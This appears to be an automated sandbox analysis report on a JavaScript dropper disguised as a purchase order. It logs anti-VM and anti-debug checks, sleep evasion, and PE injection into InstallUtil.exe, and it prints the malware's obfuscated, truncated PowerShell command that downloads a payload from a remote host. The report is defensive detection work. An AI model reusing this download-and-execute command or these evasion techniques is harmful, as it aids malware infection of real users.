Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96418s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96248s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -95919s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99876s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99751s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99626s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99501s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99376s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99251s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99001s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98876s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98751s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98623s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98284s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97948s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97756s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97548s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97353s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96988s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99632	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99362	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97316	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96933	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96418	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99876	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99751	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99626	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99501	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99126	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98876	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98751	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98623	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98284	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97948	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97756	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97548	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97353	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96988	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: InstallUtil.exe, 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: wscript.exe, 00000000.00000003.1662538623.00000209DC798000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669249434.00000209DC518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669363998.00000209DC66A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669141766.00000209DC3CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668965295.00000209DCA57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662629344.00000209DC281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1661979176.00000209DC517000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662729642.00000209DC51F000.00000004.00000020.00020000.00000000.sdmp, Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Binary or memory string: var xWdKhZPqtzsiLmcZuecAPWkGWGfiRcaChKZmUUegkRKLxcLhGgixPuWLGqJKAmbkokKkLfazihWhsTgZebIhHiUvNntnLueibPGubKiWmpLLonljLGUgLLoCKWRLbmhbWAaLUlWhqemUKdZuQWLnWWULSZsKuRWKKlCZfLWvzmaUpxLrZLiUpBcKihnucBGvimWrepek = "olzkWznhLGZjolcfcCmneILhZiobWPTKKhpcKRWfzWmmLNLLkckzLLlNOAKNGpiGPLblSGoJjAcPLWBWbUvkovhLoOiGWKPhqiebicCiqcdWxOUTiKGUUciGpKLKzrhBUbKkRmHALpksxtbAKLiAWAGNKTKipLrUxPGZKLZAxiLxWANGLzKqKWiWthLKgrqUizGAddGc";
Source: InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: wscript.exe, 00000000.00000003.1668965295.00000209DCA57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xWdKhZPqtzsiLmcZuecAPWkGWGfiRcaChKZmUUegkRKLxcLhGgixPuWLGqJKAmbkokKkLfazihWhsTgZebIhHiUvNntnLueibPGubKiWmpLLonljLGUgLLoCKWRLbmhbWAaLUlWhqemUKdZuQWLnWWULSZsKuRWKKlCZfLWvzmaUpxLrZLiUpBcKihnucBGvimWrepekd
Source: powershell.exe, 00000003.00000002.1803109575.000001CB9D608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1664031606.00000209DC298000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xWdKhZPqtzsiLmcZuecAPWkGWGfiRcaChKZmUUegkRKLxcLhGgixPuWLGqJKAmbkokKkLfazihWhsTgZebIhHiUvNntnLueibPGubKiWmpLLonljLGUgLLoCKWRLbmhbWAaLUlWhqemUKdZuQWLnWWULSZsKuRWKKlCZfLWvzmaUpxLrZLiUpBcKihnucBGvimWrepekH
Source: InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: wscript.exe, 00000000.00000003.1668914130.00000209DC858000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: }xWdKhZPqtzsiLmcZuecAPWkGWGfiRcaChKZmUUegkRKLxcLhGgixPuWLGqJKAmbkokKkLfazihWhsTgZebIhHiUvNntnLueibPGubKiWmpLLonljLGUgLLoCKWRLbmhbWAaLUlWhqemUKdZuQWLnWWULSZsKuRWKKlCZfLWvzmaUpxLrZLiUpBcKihnucBGvimWrepek

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 6_2_015D70B0 CheckRemoteDebuggerPresent,

6_2_015D70B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7552.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: FD4008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? 